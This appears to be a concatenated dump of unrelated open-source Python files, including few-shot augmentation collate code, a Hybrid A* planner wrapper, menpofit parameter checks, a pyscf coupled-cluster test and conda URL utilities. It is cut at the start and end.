"""Apply transforms and augmentations on a batch.
The images and targets in a batch are augmented by the number of `self.times` and the targets are augmented
to match the shape of images.
Args:
batch (list of tuple): A batch returned by dataset.
Returns:
tuple: A tuple of (images, targets), here len(images)=len(targets).
"""
try:
images, targets = zip(*batch)
images = list(itertools.chain.from_iterable([[image] * self.times for image in images]))
images = [self.trfms(image).unsqueeze(0) for image in images]
targets = list(
itertools.chain.from_iterable([[target] * self.times for target in targets])
)
targets = [torch.tensor([target]) for target in targets]
assert len(images) == len(targets), "Inconsistent number of images and labels!"
images = torch.cat(images)
targets = torch.tensor(targets, dtype=torch.int64)
return images, targets
except TypeError:
raise TypeError(
"Error, probably because the transforms are passed to the dataset, the transforms should be "
"passed to the collate_fn"
)
def __call__(self, batch):
return self.method(batch)
class FewShotAugCollateFunction(object):
"""`Collate_fn` for few-shot dataloader.
For finetuning-val, finetuning-test and meta/metric-train/val/test.
"""
def __init__(self, trfms, times, times_q, way_num, shot_num, query_num, episode_size):
"""Initialize a `FewShotAugCollateFunction`.
Args:
trfms (list or tuple of list): A torchvision transfrom list of a tuple of 2 torchvision transform list.
if `list`, both support and query images will be applied the same transforms, otherwise the 1st one will
apply to support images and the 2nd one will apply to query images.
times (int): Augment times of support iamges
times_q (int ): Augment times of query images
way_num (int): Few-shot way setting
shot_num (int): Few-shot shot setting
query_num (int): Few-shot query setting
episode_size (int): Few-shot episode size setting
"""
super(FewShotAugCollateFunction, self).__init__()
try:
self.trfms_support, self.trfms_query = trfms
except Exception:
self.trfms_support = self.trfms_query = trfms
# Allow different trfms: when single T, apply to S and Q equally;
# When trfms=(T,T), apply to S and Q separately;
self.times = 1 if times == 0 else times
self.times_q = 1 if times_q == 0 else times_q
self.way_num = way_num
self.shot_num = shot_num
self.query_num = query_num
self.shot_aug = self.shot_num * self.times
self.query_aug = self.query_num * self.times_q
self.episode_size = episode_size
def method(self, batch):
"""Apply transforms and augmentations on a **few-shot** batch.
The samples of query and support are augmented separately.
For example: if aug_times=5, then 01234 -> 0000011111222223333344444.
Args:
batch (list of tuple): A batch returned by a few-shot dataset.
Returns:
tuple: a tuple of (images, gt_labels).
"""
try:
images, labels = zip(
*batch
) # images = [img_label_tuple[0] for img_label_tuple in batch] # 111111222222 (5s1q for example)
images_split_by_label = [
images[index : index + self.shot_num + self.query_num]
for index in range(0, len(images), self.shot_num + self.query_num)
] # 111111; 222222 ;
images_split_by_label_type = [
[spt_qry[: self.shot_num], spt_qry[self.shot_num :]]
for spt_qry in images_split_by_label
] # 11111,1;22222,2; == [shot, query]
# aug support
# fixme: should have a elegant method
# 1111111111,1;2222222222,2 (aug_time = 2 for example)
for cls in images_split_by_label_type:
cls[0] = cls[0] * self.times # aug support
cls[1] = cls[1] * self.times_q # aug query
# flatten and apply trfms
flat = lambda t: [x for sub in t for x in flat(sub)] if isinstance(t, Iterable) else [t]
images = flat(images_split_by_label_type)
# 1111111111122222222222
# images = [self.trfms(image) for image in images] # list of tensors([c, h, w])
images = [
self.trfms_support(image)
if index % (self.shot_aug + self.query_aug) < self.shot_aug
else self.trfms_query(image)
for index, image in enumerate(images)
] # list of tensors([c, h, w])
images = torch.stack(images) # [b', c, h, w] <- b' = b after aug
# labels
# global_labels = torch.tensor(labels,dtype=torch.int64)
# global_labels = torch.tensor(labels,dtype=torch.int64).reshape(self.episode_size,self.way_num,
# self.shot_num*self.times+self.query_num)
global_labels = torch.tensor(labels, dtype=torch.int64).reshape(
self.episode_size, self.way_num, self.shot_num + self.query_num
)
global_labels = (
global_labels[..., 0]
.unsqueeze(-1)
.repeat(
1,
1,
self.shot_num * self.times + self.query_num * self.times_q,
)
)
return images, global_labels
# images.shape = [e*w*(q+s) x c x h x w], global_labels.shape = [e x w x (q+s)]
except TypeError:
raise TypeError(
"Error, probably because the transforms are passed to the dataset, the transforms should be "
"passed to the collate_fn"
)
def __call__(self, batch):
return self.method(batch)
|
pointers/pointers.py
|
lootek/govspy
| 106 |
75807
|
# There is no equivalent to pointers in python
def upit(str):
return str.upper()
def uplist(mylist):
for i in range(len(mylist)):
mylist[i] = mylist[i].upper()
name = "peter"
upit(name)
print name # peter
name = upit(name)
print name # PETER
# but you can do a useless cheat and make it mutable
name = list("peter")
uplist(name)
name = ''.join(name)
print name # PETER
|
lib/training/train_factory.py
|
shachargluska/centerpose
| 245 |
75831
|
from __future__ import absolute_import, division, print_function
from .multi_pose import MultiPoseTrainer
train_factory = {
'multi_pose': MultiPoseTrainer,
}
|
examples/optimization/multiobjective/constnsga2jpq.py
|
sveilleux1/pybrain
| 2,208 |
75832
|
<gh_stars>1000+
from __future__ import print_function
#!/usr/bin/env python
""" An illustration of using the NSGA-II multi-objective optimization algorithm
on Constrained Multi-Objective Optimization benchmark function. """
__author__ = '<NAME>, <EMAIL>'
from pybrain.optimization import ConstMultiObjectiveGA
from pybrain.rl.environments.functions.multiobjective import ConstDeb,ConstSrn, \
ConstOsy,ConstTnk,ConstBnh
import pylab
from scipy import zeros, array
# The Deb function
#f = ConstDeb()
# The Srinivas & Deb function
#f = ConstSrn()
# The Osyczka & Kundu function
#f = ConstOsy()
# The Tanaka function
#f = ConstTnk()
# The Binh & Korn function
f = ConstBnh()
# start at the origin
x0 = zeros(f.indim)
x0 = array([min_ for min_, max_ in f.xbound])
# the optimization for a maximum of 25 generations
n = ConstMultiObjectiveGA(f, x0, storeAllEvaluations = True, populationSize = 100, eliteProportion = 1.0,
topProportion = 1.0, mutationProb = 1.0, mutationStdDev = 0.3, storeAllPopulations = True, allowEquality = False)
print('Start Learning')
n.learn(50)
print('End Learning')
# plotting the results (blue = all evaluated points, red = resulting pareto front)
print('Plotting the Results')
print('All Evaluations.... take some time')
for x in n._allEvaluations:
if x[1]:
pylab.plot([x[0][0]], [x[0][1]], 'b.')
else:
pylab.plot([x[0][0]], [x[0][1]], 'r.')
for x in n.bestEvaluation: pylab.plot([x[0][0]], [x[0][1]], 'go')
pylab.show()
print('Pareto Front')
for x in n.bestEvaluation: pylab.plot([x[0][0]], [x[0][1]], 'go')
pylab.show()
print('===========')
print('= Results =')
print('===========')
'''
i=0
for gen in n._allGenerations:
print 'Generation: ',i
for j in range(len(gen[1])):
print gen[1].keys()[j],gen[1].values()[j]
i+=1
'''
print('Population size ',n.populationSize)
print('Elitism Proportion ',n.eliteProportion)
print('Mutation Probability ',n.mutationProb)
print('Mutation Std Deviation ',n.mutationStdDev)
print('Objective Evaluation number ',n.numEvaluations)
print('last generation Length of bestEvaluation ',len(n.bestEvaluation))
print('Best Evaluable : Best Evaluation')
for i in range(len(n.bestEvaluation)):
assert len(n.bestEvaluation) == len(n.bestEvaluable)
print(n.bestEvaluable[i],':',n.bestEvaluation[i])
|
dassl/evaluation/build.py
|
Fyy10/Dassl.pytorch
| 563 |
75859
|
from dassl.utils import Registry, check_availability
EVALUATOR_REGISTRY = Registry("EVALUATOR")
def build_evaluator(cfg, **kwargs):
avai_evaluators = EVALUATOR_REGISTRY.registered_names()
check_availability(cfg.TEST.EVALUATOR, avai_evaluators)
if cfg.VERBOSE:
print("Loading evaluator: {}".format(cfg.TEST.EVALUATOR))
return EVALUATOR_REGISTRY.get(cfg.TEST.EVALUATOR)(cfg, **kwargs)
|
pylot/planning/hybrid_astar/hybrid_astar_planner.py
|
mageofboy/pylot
| 231 |
75861
|
from hybrid_astar_planner.HybridAStar.hybrid_astar_wrapper \
import apply_hybrid_astar
import numpy as np
from pylot.planning.planner import Planner
class HybridAStarPlanner(Planner):
"""Wrapper around the Hybrid A* planner.
Note:
Details can be found at `Hybrid A* Planner`_.
Args:
world: (:py:class:`~pylot.planning.world.World`): A reference to the
planning world.
flags (absl.flags): Object to be used to access absl flags.
.. _Hybrid A* Planner:
https://github.com/erdos-project/hybrid_astar_planner
"""
def __init__(self, world, flags, logger):
super().__init__(world, flags, logger)
self._hyperparameters = {
"step_size": flags.step_size_hybrid_astar,
"max_iterations": flags.max_iterations_hybrid_astar,
"completion_threshold": flags.completion_threshold,
"angle_completion_threshold": flags.angle_completion_threshold,
"rad_step": flags.rad_step,
"rad_upper_range": flags.rad_upper_range,
"rad_lower_range": flags.rad_lower_range,
"obstacle_clearance": flags.obstacle_clearance_hybrid_astar,
"lane_width": flags.lane_width_hybrid_astar,
"radius": flags.radius,
"car_length": flags.car_length,
"car_width": flags.car_width,
}
def run(self, timestamp, ttd=None):
"""Runs the planner.
Note:
The planner assumes that the world is up-to-date.
Returns:
:py:class:`~pylot.planning.waypoints.Waypoints`: Waypoints of the
planned trajectory.
"""
obstacle_list = self._world.get_obstacle_list()
if len(obstacle_list) == 0:
# Do not use Hybrid A* if there are no obstacles.
output_wps = self._world.follow_waypoints(self._flags.target_speed)
else:
# Hybrid a* does not take into account the driveable region.
# It constructs search space as a top down, minimum bounding
# rectangle with padding in each dimension.
self._logger.debug("@{}: Hyperparameters: {}".format(
timestamp, self._hyperparameters))
initial_conditions = self._compute_initial_conditions(
obstacle_list)
self._logger.debug("@{}: Initial conditions: {}".format(
timestamp, initial_conditions))
path_x, path_y, _, success = apply_hybrid_astar(
initial_conditions, self._hyperparameters)
if success:
self._logger.debug(
"@{}: Hybrid A* succeeded".format(timestamp))
speeds = [self._flags.target_speed] * len(path_x)
self._logger.debug("@{}: Hybrid A* Path X: {}".format(
timestamp, path_x.tolist()))
self._logger.debug("@{}: Hybrid A* Path Y: {}".format(
timestamp, path_y.tolist()))
self._logger.debug("@{}: Hybrid A* Speeds: {}".format(
timestamp, speeds))
output_wps = self.build_output_waypoints(
path_x, path_y, speeds)
else:
self._logger.error("@{}: Hybrid A* failed. "
"Sending emergency stop.".format(timestamp))
output_wps = self._world.follow_waypoints(0)
return output_wps
def _compute_initial_conditions(self, obstacles):
ego_transform = self._world.ego_transform
start = np.array([
ego_transform.location.x,
ego_transform.location.y,
np.deg2rad(ego_transform.rotation.yaw),
])
self._world.waypoints.remove_completed(ego_transform.location)
end_index = min(self._flags.num_waypoints_ahead,
len(self._world.waypoints.waypoints) - 1)
if end_index < 0:
# If no more waypoints left. Then our location is our end wp.
self._logger.debug("@{}: No more waypoints left")
end_wp = ego_transform
else:
end_wp = self._world.waypoints.waypoints[end_index]
end = np.array([
end_wp.location.x, end_wp.location.y,
np.deg2rad(ego_transform.rotation.yaw)
])
initial_conditions = {
"start": start,
"end": end,
"obs": obstacles,
}
return initial_conditions
|
pyscf/pbc/cc/test/test_kuccsd_supercell_vs_kpts.py
|
robert-anderson/pyscf
| 501 |
75871
|
<reponame>robert-anderson/pyscf
import unittest
import numpy
from pyscf.pbc import gto
from pyscf.pbc import scf,cc
from pyscf import cc as mol_cc
from pyscf.pbc.tools.pbc import super_cell
#from pyscf import lib
#from pyscf.pbc import gto
#from pyscf.pbc import scf,cc
#from pyscf.pbc.cc import kccsd_uhf
#from pyscf.pbc.cc import kccsd
#from pyscf.pbc.cc import eom_kccsd_ghf
#from pyscf.pbc.cc import eom_kccsd_uhf
#from pyscf.pbc.lib import kpts_helper
#from pyscf.pbc.tools.pbc import super_cell
# generating the cell
cell = gto.M(
unit = 'B',
a = [[ 0., 3.37013733, 3.37013733],
[ 3.37013733, 0., 3.37013733],
[ 3.37013733, 3.37013733, 0. ]],
mesh = [13]*3,
atom = '''He 0 0 0
He 1.68506866 1.68506866 1.68506866''',
basis = [[0, (1., 1.)], [0, (.5, 1.)]],
verbose = 0,
)
nmp = [3,3,1]
# treating supercell at gamma point
supcell = super_cell(cell,nmp)
gmf = scf.UHF(supcell,exxdiv=None)
ehf = gmf.kernel()
gcc = cc.UCCSD(gmf)
ecc, t1, t2 = gcc.kernel()
print('UHF energy (supercell) %f \n' % (float(ehf)/numpy.prod(nmp)+4.343308413289))
print('UCCSD correlation energy (supercell) %f \n' % (float(ecc)/numpy.prod(nmp)+0.009470753047083676))
# treating mesh of k points
kpts = cell.make_kpts(nmp)
kpts -= kpts[0]
kmf = scf.KUHF(cell,kpts,exxdiv=None)
ehf = kmf.kernel()
kcc = cc.KUCCSD(kmf)
ecc, t1, t2 = kcc.kernel()
print('UHF energy (kpts) %f \n' % (float(ehf+4.343308413289)))
print('UCCSD correlation energy (kpts) %f \n' % (float(ecc+0.009470753047083676)))
|
DeepAlignmentNetwork/menpofit/checks.py
|
chiawei-liu/DeepAlignmentNetwork
| 220 |
75973
|
<filename>DeepAlignmentNetwork/menpofit/checks.py
import warnings
import collections
from functools import partial
import numpy as np
from menpo.base import name_of_callable
from menpo.shape import TriMesh
from menpo.transform import PiecewiseAffine
def check_diagonal(diagonal):
r"""
Checks that the diagonal length used to normalize the images' size is
``>= 20``.
Parameters
----------
diagonal : `int`
The value to check.
Returns
-------
diagonal : `int`
The value if it's correct.
Raises
------
ValueError
diagonal must be >= 20 or None
"""
if diagonal is not None and diagonal < 20:
raise ValueError("diagonal must be >= 20 or None")
return diagonal
def check_landmark_trilist(image, transform, group=None):
r"""
Checks that the provided image has a triangulated shape (thus an isntance of
`menpo.shape.TriMesh`) and the transform is `menpo.transform.PiecewiseAffine`
Parameters
----------
image : `menpo.image.Image` or subclass
The input image.
transform : `menpo.transform.PiecewiseAffine`
The transform object.
group : `str` or ``None``, optional
The group of the shape to check.
Raises
------
Warning
The given images do not have an explicit triangulation applied. A
Delaunay Triangulation will be computed and used for warping. This may
be suboptimal and cause warping artifacts.
"""
shape = image.landmarks[group].lms
check_trilist(shape, transform)
def check_trilist(shape, transform):
r"""
Checks that the provided shape is triangulated (thus an isntance of
`menpo.shape.TriMesh`) and the transform is `menpo.transform.PiecewiseAffine`
Parameters
----------
shape : `menpo.shape.TriMesh`
The input shape (usually the reference/mean shape of a model).
transform : `menpo.transform.PiecewiseAffine`
The transform object.
Raises
------
Warning
The given images do not have an explicit triangulation applied. A
Delaunay Triangulation will be computed and used for warping. This may
be suboptimal and cause warping artifacts.
"""
if not isinstance(shape, TriMesh) and isinstance(transform,
PiecewiseAffine):
warnings.warn('The given images do not have an explicit triangulation '
'applied. A Delaunay Triangulation will be computed '
'and used for warping. This may be suboptimal and cause '
'warping artifacts.')
def check_scales(scales):
r"""
Checks that the provided `scales` argument is either `int` or `float` or an
iterable of those. It makes sure that it returns a `list` of `scales`.
Parameters
----------
scales : `int` or `float` or `list/tuple` of those
The value to check.
Returns
-------
scales : `list` of `int` or `float`
The scales in a list.
Raises
------
ValueError
scales must be an int/float or a list/tuple of int/float
"""
if isinstance(scales, (int, float)):
return [scales]
elif len(scales) == 1 and isinstance(scales[0], (int, float)):
return list(scales)
elif len(scales) > 1:
return check_scales(scales[0]) + check_scales(scales[1:])
else:
raise ValueError("scales must be an int/float or a list/tuple of "
"int/float")
def check_multi_scale_param(n_scales, types, param_name, param):
r"""
General function for checking a parameter defined for multiple scales. It
raises an error if the parameter is not an iterable with the correct size and
correct types.
Parameters
----------
n_scales : `int`
The number of scales.
types : `tuple`
The `tuple` of variable types that the parameter is allowed to have.
param_name : `str`
The name of the parameter.
param : `types`
The parameter value.
Returns
-------
param : `list` of `types`
The list of values per scale.
Raises
------
ValueError
{param_name} must be in {types} or a list/tuple of {types} with the same
length as the number of scales
"""
error_msg = "{0} must be in {1} or a list/tuple of " \
"{1} with the same length as the number " \
"of scales".format(param_name, types)
# Could be a single value - or we have an error
if isinstance(param, types):
return [param] * n_scales
elif not isinstance(param, collections.Iterable):
raise ValueError(error_msg)
# Must be an iterable object
len_param = len(param)
isinstance_all_in_param = all(isinstance(p, types) for p in param)
if len_param == 1 and isinstance_all_in_param:
return list(param) * n_scales
elif len_param == n_scales and isinstance_all_in_param:
return list(param)
else:
raise ValueError(error_msg)
def check_callable(callables, n_scales):
r"""
Checks the callable type per level.
Parameters
----------
callables : `callable` or `list` of `callables`
The callable to be used per scale.
n_scales : `int`
The number of scales.
Returns
-------
callable_list : `list`
A `list` of callables.
Raises
------
ValueError
callables must be a callable or a list/tuple of callables with the same
length as the number of scales
"""
if callable(callables):
return [callables] * n_scales
elif len(callables) == 1 and np.alltrue([callable(f) for f in callables]):
return list(callables) * n_scales
elif len(callables) == n_scales and np.alltrue([callable(f)
for f in callables]):
return list(callables)
else:
raise ValueError("callables must be a callable or a list/tuple of "
"callables with the same length as the number "
"of scales")
def check_patch_shape(patch_shape, n_scales):
r"""
Function for checking a multi-scale `patch_shape` parameter value.
Parameters
----------
patch_shape : `list/tuple` of `int/float` or `list` of those
The patch shape per scale
n_scales : `int`
The number of scales.
Returns
-------
patch_shape : `list` of `list/tuple` of `int/float`
The list of patch shape per scale.
Raises
------
ValueError
patch_shape must be a list/tuple of int or a list/tuple of lit/tuple of
int/float with the same length as the number of scales
"""
if len(patch_shape) == 2 and isinstance(patch_shape[0], int):
return [patch_shape] * n_scales
elif len(patch_shape) == 1:
return check_patch_shape(patch_shape[0], 1)
elif len(patch_shape) == n_scales:
l1 = check_patch_shape(patch_shape[0], 1)
l2 = check_patch_shape(patch_shape[1:], n_scales-1)
return l1 + l2
else:
raise ValueError("patch_shape must be a list/tuple of int or a "
"list/tuple of lit/tuple of int/float with the "
"same length as the number of scales")
def check_max_components(max_components, n_scales, var_name):
r"""
Checks the maximum number of components per scale. It must be ``None`` or
`int` or `float` or a `list` of those containing ``1`` or ``{n_scales}``
elements.
Parameters
----------
max_components : ``None`` or `int` or `float` or a `list` of those
The value to check.
n_scales : `int`
The number of scales.
var_name : `str`
The name of the variable.
Returns
-------
max_components : `list` of ``None`` or `int` or `float`
The list of max components per scale.
Raises
------
ValueError
{var_name} must be None or an int > 0 or a 0 <= float <= 1 or a list of
those containing 1 or {n_scales} elements
"""
str_error = ("{} must be None or an int > 0 or a 0 <= float <= 1 or "
"a list of those containing 1 or {} elements").format(
var_name, n_scales)
if not isinstance(max_components, (list, tuple)):
max_components_list = [max_components] * n_scales
elif len(max_components) == 1:
max_components_list = [max_components[0]] * n_scales
elif len(max_components) == n_scales:
max_components_list = max_components
else:
raise ValueError(str_error)
for comp in max_components_list:
if comp is not None:
if not isinstance(comp, int):
if not isinstance(comp, float):
raise ValueError(str_error)
return max_components_list
def check_max_iters(max_iters, n_scales):
r"""
Function that checks the value of a `max_iters` parameter defined for
multiple scales. It must be `int` or `list` of `int`.
Parameters
----------
max_iters : `int` or `list` of `int`
The value to check.
n_scales : `int`
The number of scales.
Returns
-------
max_iters : `list` of `int`
The list of values per scale.
Raises
------
ValueError
max_iters can be integer, integer list containing 1 or {n_scales}
elements or None
"""
if type(max_iters) is int:
max_iters = [np.round(max_iters/n_scales)
for _ in range(n_scales)]
elif len(max_iters) == 1 and n_scales > 1:
max_iters = [np.round(max_iters[0]/n_scales)
for _ in range(n_scales)]
elif len(max_iters) != n_scales:
raise ValueError('max_iters can be integer, integer list '
'containing 1 or {} elements or '
'None'.format(n_scales))
return np.require(max_iters, dtype=np.int)
def check_sampling(sampling, n_scales):
r"""
Function that checks the value of a `sampling` parameter defined for
multiple scales. It must be `int` or `ndarray` or `list` of those.
Parameters
----------
sampling : `int` or `ndarray` or `list` of those
The value to check.
n_scales : `int`
The number of scales.
Returns
-------
sampling : `list` of `int` or `ndarray`
The list of values per scale.
Raises
------
ValueError
A sampling list can only contain 1 element or {n_scales} elements
ValueError
sampling can be an integer or ndarray, a integer or ndarray list
containing 1 or {n_scales} elements or None
"""
if (isinstance(sampling, (list, tuple)) and
np.alltrue([isinstance(s, (np.ndarray, np.int)) or sampling is None
for s in sampling])):
if len(sampling) == 1:
return sampling * n_scales
elif len(sampling) == n_scales:
return sampling
else:
raise ValueError('A sampling list can only '
'contain 1 element or {} '
'elements'.format(n_scales))
elif isinstance(sampling, (np.ndarray, np.int)) or sampling is None:
return [sampling] * n_scales
else:
raise ValueError('sampling can be an integer or ndarray, '
'a integer or ndarray list '
'containing 1 or {} elements or '
'None'.format(n_scales))
def set_models_components(models, n_components):
r"""
Function that sets the number of active components to a list of models.
Parameters
----------
models : `list` or `class`
The list of models per scale.
n_components : `int` or `float` or ``None`` or `list` of those
The number of components per model.
Raises
------
ValueError
n_components can be an integer or a float or None or a list containing 1
or {n_scales} of those
"""
if n_components is not None:
n_scales = len(models)
if type(n_components) is int or type(n_components) is float:
for am in models:
am.n_active_components = n_components
elif len(n_components) == 1 and n_scales > 1:
for am in models:
am.n_active_components = n_components[0]
elif len(n_components) == n_scales:
for am, n in zip(models, n_components):
am.n_active_components = n
else:
raise ValueError('n_components can be an integer or a float '
'or None or a list containing 1 or {} of '
'those'.format(n_scales))
def check_model(model, cls):
r"""
Function that checks whether the provided `class` object is a subclass of
the provided base `class`.
Parameters
----------
model : `class`
The object.
cls : `class`
The required base class.
Raises
------
ValueError
Model must be a {cls} instance.
"""
if not isinstance(model, cls):
raise ValueError('Model must be a {} instance.'.format(
name_of_callable(cls)))
def check_algorithm_cls(algorithm_cls, n_scales, base_algorithm_cls):
r"""
Function that checks whether the `list` of `class` objects defined per scale
are subclasses of the provided base `class`.
Parameters
----------
algorithm_cls : `class` or `list` of `class`
The list of objects per scale.
n_scales : `int`
The number of scales.
base_algorithm_cls : `class`
The required base class.
Raises
------
ValueError
algorithm_cls must be a subclass of {base_algorithm_cls} or a list/tuple
of {base_algorithm_cls} subclasses with the same length as the number of
scales {n_scales}
"""
if (isinstance(algorithm_cls, partial) and
base_algorithm_cls in algorithm_cls.func.mro()):
return [algorithm_cls] * n_scales
elif (isinstance(algorithm_cls, type) and
base_algorithm_cls in algorithm_cls.mro()):
return [algorithm_cls] * n_scales
elif len(algorithm_cls) == 1:
return check_algorithm_cls(algorithm_cls[0], n_scales,
base_algorithm_cls)
elif len(algorithm_cls) == n_scales:
return [check_algorithm_cls(a, 1, base_algorithm_cls)[0]
for a in algorithm_cls]
else:
raise ValueError("algorithm_cls must be a subclass of {} or a "
"list/tuple of {} subclasses with the same length "
"as the number of scales {}"
.format(base_algorithm_cls, base_algorithm_cls,
n_scales))
def check_graph(graph, graph_types, param_name, n_scales):
r"""
Checks the provided graph per pyramidal level. The graph must be a
subclass of `graph_types` or a `list` of those.
Parameters
----------
graph : `graph` or `list` of `graph` types
The graph argument to check.
graph_types : `graph` or `tuple` of `graphs`
The `tuple` of allowed graph types.
param_name : `str`
The name of the graph parameter.
n_scales : `int`
The number of pyramidal levels.
Returns
-------
graph : `list` of `graph` types
The graph per scale in a `list`.
Raises
------
ValueError
{param_name} must be a list of length equal to the number of scales.
ValueError
{param_name} must be a list of {graph_types_str}. {} given instead.
"""
# check if the provided graph is a list
if not isinstance(graph, list):
graphs = [graph] * n_scales
elif len(graph) == 1:
graphs = graph * n_scales
elif len(graph) == n_scales:
graphs = graph
else:
raise ValueError('{} must be a list of length equal to the number of '
'scales.'.format(param_name))
# check if the provided graph_types is a list
if not isinstance(graph_types, list):
graph_types = [graph_types]
# check each member of the graphs list
for g in graphs:
if g is not None:
if type(g) not in graph_types:
graph_types_str = ' or '.join(gt.__name__ for gt in graph_types)
raise ValueError('{} must be a list of {}. {} given '
'instead.'.format(param_name, graph_types_str,
type(g).__name__))
return graphs
|
conda/common/url.py
|
jack-pappas/conda
| 4,825 |
76000
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
import codecs
from getpass import getpass
from os.path import abspath, expanduser
import re
import socket
from .compat import input, on_win
from .path import split_filename, strip_pkg_extension
from .._vendor.auxlib.decorators import memoize
from .._vendor.urllib3.exceptions import LocationParseError
from .._vendor.urllib3.util.url import Url, parse_url
try: # pragma: py2 no cover
# Python 3
from urllib.parse import (quote, quote_plus, unquote, unquote_plus)
except ImportError: # pragma: py3 no cover
# Python 2
from urllib import (quote, quote_plus, unquote, unquote_plus) # NOQA
def hex_octal_to_int(ho):
ho = ord(ho)
o0 = ord('0')
o9 = ord('9')
oA = ord('A')
oF = ord('F')
res = ho - o0 if ho >= o0 and ho <= o9 else (ho - oA + 10) if ho >= oA and ho <= oF else None
return res
@memoize
def percent_decode(path):
# This is not fast so avoid when we can.
if '%' not in path:
return path
ranges = []
for m in re.finditer(r'(%[0-9A-F]{2})', path):
ranges.append((m.start(), m.end()))
if not len(ranges):
return path
# Sorry! Correctness is more important than speed at the moment.
# Should use a map + lambda eventually.
result = b''
skips = 0
for i, c in enumerate(path):
if skips > 0:
skips -= 1
continue
c = c.encode('ascii')
emit = c
if c == b'%':
for r in ranges:
if i == r[0]:
import struct
emit = struct.pack(
"B", hex_octal_to_int(path[i+1])*16 + hex_octal_to_int(path[i+2]))
skips = 2
break
if emit:
result += emit
return codecs.utf_8_decode(result)[0]
file_scheme = 'file://'
# Keeping this around for now, need to combine with the same function in conda/common/path.py
"""
def url_to_path(url):
assert url.startswith(file_scheme), "{} is not a file-scheme URL".format(url)
decoded = percent_decode(url[len(file_scheme):])
if decoded.startswith('/') and decoded[2] == ':':
# A Windows path.
decoded.replace('/', '\\')
return decoded
"""
@memoize
def path_to_url(path):
if not path:
raise ValueError('Not allowed: %r' % path)
if path.startswith(file_scheme):
try:
path.decode('ascii')
except UnicodeDecodeError:
raise ValueError('Non-ascii not allowed for things claiming to be URLs: %r' % path)
return path
path = abspath(expanduser(path)).replace('\\', '/')
# We do not use urljoin here because we want to take our own
# *very* explicit control of how paths get encoded into URLs.
# We should not follow any RFCs on how to encode and decode
# them, we just need to make sure we can represent them in a
# way that will not cause problems for whatever amount of
# urllib processing we *do* need to do on them (which should
# be none anyway, but I doubt that is the case). I have gone
# for ASCII and % encoding of everything not alphanumeric or
# not in `!'()*-._/:`. This should be pretty save.
#
# To avoid risking breaking the internet, this code only runs
# for `file://` URLs.
#
percent_encode_chars = "!'()*-._/\\:"
percent_encode = lambda s: "".join(["%%%02X" % ord(c), c]
[c < "{" and c.isalnum() or c in percent_encode_chars]
for c in s)
if any(ord(char) >= 128 for char in path):
path = percent_encode(path.decode('unicode-escape')
if hasattr(path, 'decode')
else bytes(path, "utf-8").decode('unicode-escape'))
# https://blogs.msdn.microsoft.com/ie/2006/12/06/file-uris-in-windows/
if len(path) > 1 and path[1] == ':':
path = file_scheme + '/' + path
else:
path = file_scheme + path
return path
@memoize
def urlparse(url):
if on_win and url.startswith('file:'):
url.replace('\\', '/')
return parse_url(url)
def url_to_s3_info(url):
"""Convert an s3 url to a tuple of bucket and key.
Examples:
>>> url_to_s3_info("s3://bucket-name.bucket/here/is/the/key")
('bucket-name.bucket', '/here/is/the/key')
"""
parsed_url = parse_url(url)
assert parsed_url.scheme == 's3', "You can only use s3: urls (not %r)" % url
bucket, key = parsed_url.host, parsed_url.path
return bucket, key
def is_url(url):
"""
Examples:
>>> is_url(None)
False
>>> is_url("s3://some/bucket")
True
"""
if not url:
return False
try:
return urlparse(url).scheme is not None
except LocationParseError:
return False
def is_ipv4_address(string_ip):
"""
Examples:
>>> [is_ipv4_address(ip) for ip in ('8.8.8.8', '192.168.10.10', '255.255.255.255')]
[True, True, True]
>>> [is_ipv4_address(ip) for ip in ('8.8.8', '192.168.10.10.20', '256.255.255.255', '::1')]
[False, False, False, False]
"""
try:
socket.inet_aton(string_ip)
except socket.error:
return False
return string_ip.count('.') == 3
def is_ipv6_address(string_ip):
"""
Examples:
>> [is_ipv6_address(ip) for ip in ('::1', '2001:db8:85a3::370:7334', '1234:'*7+'1234')]
[True, True, True]
>> [is_ipv6_address(ip) for ip in ('192.168.10.10', '1234:'*8+'1234')]
[False, False]
"""
try:
inet_pton = socket.inet_pton
except AttributeError:
return is_ipv6_address_win_py27(string_ip)
try:
inet_pton(socket.AF_INET6, string_ip)
except socket.error:
return False
return True
def is_ipv6_address_win_py27(string_ip):
"""
Examples:
>>> [is_ipv6_address_win_py27(ip) for ip in ('::1', '1234:'*7+'1234')]
[True, True]
>>> [is_ipv6_address_win_py27(ip) for ip in ('192.168.10.10', '1234:'*8+'1234')]
[False, False]
"""
# python 2.7 on windows does not have socket.inet_pton
return bool(re.match(r"" # lgtm [py/regex/unmatchable-dollar]
r"^(((?=.*(::))(?!.*\3.+\3))\3?|[\dA-F]{1,4}:)"
r"([\dA-F]{1,4}(\3|:\b)|\2){5}"
r"(([\dA-F]{1,4}(\3|:\b|$)|\2){2}|"
r"(((2[0-4]|1\d|[1-9])?\d|25[0-5])\.?\b){4})\Z",
string_ip,
flags=re.DOTALL | re.IGNORECASE))
def is_ip_address(string_ip):
"""
Examples:
>> is_ip_address('192.168.10.10')
True
>> is_ip_address('::1')
True
>> is_ip_address('www.google.com')
False
"""
return is_ipv4_address(string_ip) or is_ipv6_address(string_ip)
def join(*args):
start = '/' if not args[0] or args[0].startswith('/') else ''
return start + '/'.join(y for y in (x.strip('/') for x in args if x) if y)
join_url = join
def has_scheme(value):
return re.match(r'[a-z][a-z0-9]{0,11}://', value)
def strip_scheme(url):
"""
Examples:
>>> strip_scheme("https://www.conda.io")
'www.conda.io'
>>> strip_scheme("s3://some.bucket/plus/a/path.ext")
'some.bucket/plus/a/path.ext'
"""
return url.split('://', 1)[-1]
def mask_anaconda_token(url):
_, token = split_anaconda_token(url)
return url.replace(token, "<TOKEN>", 1) if token else url
def split_anaconda_token(url):
"""
Examples:
>>> split_anaconda_token("https://1.2.3.4/t/tk-123-456/path")
(u'https://1.2.3.4/path', u'tk-123-456')
>>> split_anaconda_token("https://1.2.3.4/t//path")
(u'https://1.2.3.4/path', u'')
>>> split_anaconda_token("https://some.domain/api/t/tk-123-456/path")
(u'https://some.domain/api/path', u'tk-123-456')
>>> split_anaconda_token("https://1.2.3.4/conda/t/tk-123-456/path")
(u'https://1.2.3.4/conda/path', u'tk-123-456')
>>> split_anaconda_token("https://1.2.3.4/path")
(u'https://1.2.3.4/path', None)
>>> split_anaconda_token("https://10.2.3.4:8080/conda/t/tk-123-45")
(u'https://10.2.3.4:8080/conda', u'tk-123-45')
"""
